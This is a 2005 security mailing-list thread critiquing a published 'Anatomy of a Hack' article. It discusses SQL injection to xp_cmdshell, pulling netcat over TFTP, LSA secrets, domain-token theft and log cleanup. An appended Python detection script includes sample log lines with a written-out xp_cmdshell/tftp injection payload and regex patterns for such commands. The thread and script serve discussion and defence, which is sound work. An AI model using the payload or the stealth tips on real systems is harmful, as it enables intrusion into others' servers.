Dailydave mailing list archives

Re: Anatomy of a slightly better hack


From: byte_jump <bytejump () gmail com>
Date: Wed, 6 Jul 2005 12:22:03 -0600

Hey, my screen doesn't have that cool red gradient for a background.
Does that mean I'm not a blackhat?

Note to self: It's probably not a good idea to have my domain
controllers and SQL servers reside on the same firewalled segment
(so-called DMZ) as my web servers.

From the article:
"You can port scan an entire network in short order. Doing so on a
range of well-chosen ports can give you a tremendous amount of
information about what is available on the network."
[Scanning an entire network "in short order" usually means "whoops,
you got caught despite your mad hax0rz skillz".]

"As a last resort, you can always fire off an exploit against a system
and see what happens. This is often how vulnerability scanners look
for denial of service attacks. If the system still responds after the
attack it was most likely not vulnerable!"
[After being stealthy up to this point, is doing the above such a good
idea? :-) ]

"Let's assume I've done some initial probing and know that the target
network is fully patched and that there is a really tight firewall in
front...
Since I have a SQL injection vulnerability, I can use it to command
the database server to use TFTP to download netcat to the database
server."
[I thought we were assuming a tight firewall policy...]

I'll add some comments to this wonderful document:
1) You are a bloody friggin' idiot if you are using IIS as a public web server.
2) You are more of a bloody friggin' idiot if you are using IIS as a
public web server and not using URLscan.
3) When you implement a good web server on a solid environment (read:
grsecurity, PaX, ProPolice, etc.), _do not_ trust web application
developers. Use mod_security for crying out loud and filter anything
that isn't required for your app to run.
4) What are you doing allowing your web server to TFTP outbound
through the firewall?!
5) Didn't your CISSP bootcamp class teach you not to have your domain
controllers and SQL servers on the same segment as your web servers?
6) Can someone please explain to me why on earth LSAsecrets is
encrypted? What bloody use is it?

I've had enough. I'm off to write a Snort rule to detect "C:\warez"
and "EvilTrojan" before the blackhats get a hold of my servers.

Later.

On 7/6/05, Dave Aitel <dave () immunitysec com> wrote:

This article, generically titled "Anatomy of a Hack" has been wandering
around the net lately. I thought it'd be fun, as a group exercise, to
improve on the material. Admittedly, the article is for beginners, but
maybe we can change that?

http://www.microsoft.com/technet/technetmag/issues/2005/01/AnatomyofaHack/default.aspx

One thing I notice right away is that the article uses a lot of tools you
pretty much have to guess at. What exactly does "DiscoverHosts" do? The
figures show you the output - I assume you can download these tools on
some MSDN CD or something.

I notice he's using Windows to hack with - which is funny, because very
few hackers actually use Windows as their desktop - there's no
GRSecurity for Windows. :>

In any case, it probably would be better if he had used the industry
standard nmap to do his scanning, like every other article. Nmap has
that neat "resolve all the domain names asynchronously" thing.

The bit about XSS (just below the SQL Injection bit) is oddly placed,
considering there's no guarantee this is actually cross site scripting.
It might or might not be, but we have no reason to think either way at
this point.

After that he uses xp_cmdshell('TFTP') to download netcat to his target,
although it would have been a lot cooler if he'd used debug to write a
little .com to do that for him. And netcat is so...1980s. These days
you can get Hydrogen for free and have some real encryption, file
uploading/downloading, for roughly the same size. You could probably
upload it via a debug script without having to write a stage0
downloader. Hacking without crypto is lame. I notice he creates a
directory c:\warez, which is probably not optimal.

One thing I notice about his dumpinfo tool is that it tells you all the
wrong things. Your first job when on a new box is not to find out the
users on the box - it's to find out if you were caught and clean up any
logs. He needs to first look at the processes and see if anyone is
logged on locally - a screen shot is useful for this. (I know, and you
thought CANVAS's screenshot module was just for kicks and grins, didn't
you?) "Are people sitting here editing word documents or what?" I'm
about to generate a lot of disk activity, and I don't want people to be
like "wtf?"

He does do a pretty good job with the shared service accounts gimmick,
but he misses that domain tokens can be in all sorts of random processes
- the web server is a good one. It's likely the domain admin has been
admining his web server lately, and you can hop into that process to
check to see if a token is sitting around for the taking.

It's interesting how lucky he gets with LSADump. I never get lucky
enough to see anything interesting. Is this true for everyone else too?

Then he...mounts a drive. This is very non-covert. Mounting drives is
very suspicious activity, even by windows admin standards. :>

He decides to get logged and go through terminal services so he can do
some "GUI hacking". I have no idea why he thinks this is a good idea,
but I guess it makes for flashier screenshots. Having Hydrogen instead
of netcat would make using socketpipe unnecessary.

I notice he's careful to avoid saying which password cracker he uses - I
assume john the ripper or l0phtcrack.

Anyways, just some thoughts. Back to haxing.

-dave

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
https://lists.immunitysec.com/mailman/listinfo/dailydave
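As an added example, not part of either post above, here is a small Python script in the spirit of byte_jump's "Snort rule" remark and the mod_security point: it parses IIS W3C extended log lines, URL-decodes the request repeatedly (the second payload below is double-encoded, which a single decode misses), and flags the stacked-query / xp_cmdshell / TFTP-pull sequence that Dave describes from the article. The log entries, field layout, indicator names and addresses are all constructed for illustration and do not come from any real server.

```python
"""Flag SQL-injection-to-OS-command staging (stacked queries, xp_cmdshell,
TFTP pulls, dropped nc.exe) in IIS W3C extended log lines.

Hypothetical detection script written for this thread; every log line,
address and path below is constructed, not captured from a real system.
"""
import re
from urllib.parse import unquote

# Constructed IIS W3C log.  The header names the fields; the 2nd and 3rd
# entries carry injection payloads of the kind the article walks through
# (the 3rd is double-URL-encoded), the rest are benign traffic.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-07-06 12:01:03 10.0.0.5 GET /products.asp id=17 200
2005-07-06 12:01:09 10.0.0.5 GET /products.asp id=17';exec+master..xp_cmdshell+'tftp+-i+10.0.0.5+GET+nc.exe+c:\\warez\\nc.exe'-- 500
2005-07-06 12:01:15 10.0.0.5 GET /products.asp id=17%27%3Bexec%2520master..xp_cmdshell%2520%27dir%27-- 500
2005-07-06 12:02:00 10.0.0.9 GET /search.asp q=tftp+client+howto 200
2005-07-06 12:02:04 10.0.0.9 POST /login.asp - 302
"""

# Ordered indicator list; a hit records every indicator that matched.
INDICATORS = [
    # quote, then ';' then a second statement: classic stacked-query injection
    ("stacked-query", re.compile(r"'\s*;\s*(?:exec|execute|declare|insert|drop)\b", re.I)),
    # the MSSQL extended procedure that gives the attacker an OS shell
    ("xp_cmdshell", re.compile(r"xp_cmdshell", re.I)),
    # a tftp client invocation with a GET/PUT verb (optional -i binary flag);
    # a plain mention of "tftp" in a search query does not match
    ("tftp-transfer", re.compile(r"\btftp\s+(?:-i\s+)?\S+\s+(?:get|put)\b", re.I)),
    # the netcat binary being written to disk
    ("netcat-binary", re.compile(r"\bnc\.exe\b", re.I)),
]


def decode(s, rounds=3):
    """URL-decode until stable (bounded), then turn '+' into spaces.

    IIS logs the query string as received, so %2520 style double encoding
    survives into the log; one unquote() is not enough to see the payload.
    """
    for _ in range(rounds):
        new = unquote(s)
        if new == s:
            break
        s = new
    return s.replace("+", " ")


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields line."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw or raw.startswith("#"):
            continue
        values = raw.split()
        if fields is None or len(values) != len(fields):
            continue  # malformed or pre-header line: skip rather than guess
        yield dict(zip(fields, values))


def scan_log(text):
    """Return a list of hits, each with client, status, indicators and the
    decoded request that triggered them."""
    hits = []
    for entry in parse_w3c(text):
        target = decode(entry.get("cs-uri-stem", "") + "?" + entry.get("cs-uri-query", ""))
        found = [name for name, rx in INDICATORS if rx.search(target)]
        if found:
            hits.append({
                "client": entry.get("c-ip"),
                "status": entry.get("sc-status"),
                "indicators": found,
                "decoded": target,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['client']} {hit['status']} {','.join(hit['indicators'])}")
        print(f"    {hit['decoded']}")
```

Two things worth noting. First, the same decoding step is what a request-time filter (URLscan, mod_security) needs before its patterns are any use; matching on the raw query string would miss the third entry entirely. Second, this is after-the-fact and pattern-based: a payload assembled from char()/hex conversions or a renamed tftp binary slips past it, which is why byte_jump's point 4, not letting the web or database server make outbound TFTP connections at all, is the control that actually stops the download rather than merely logging it.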
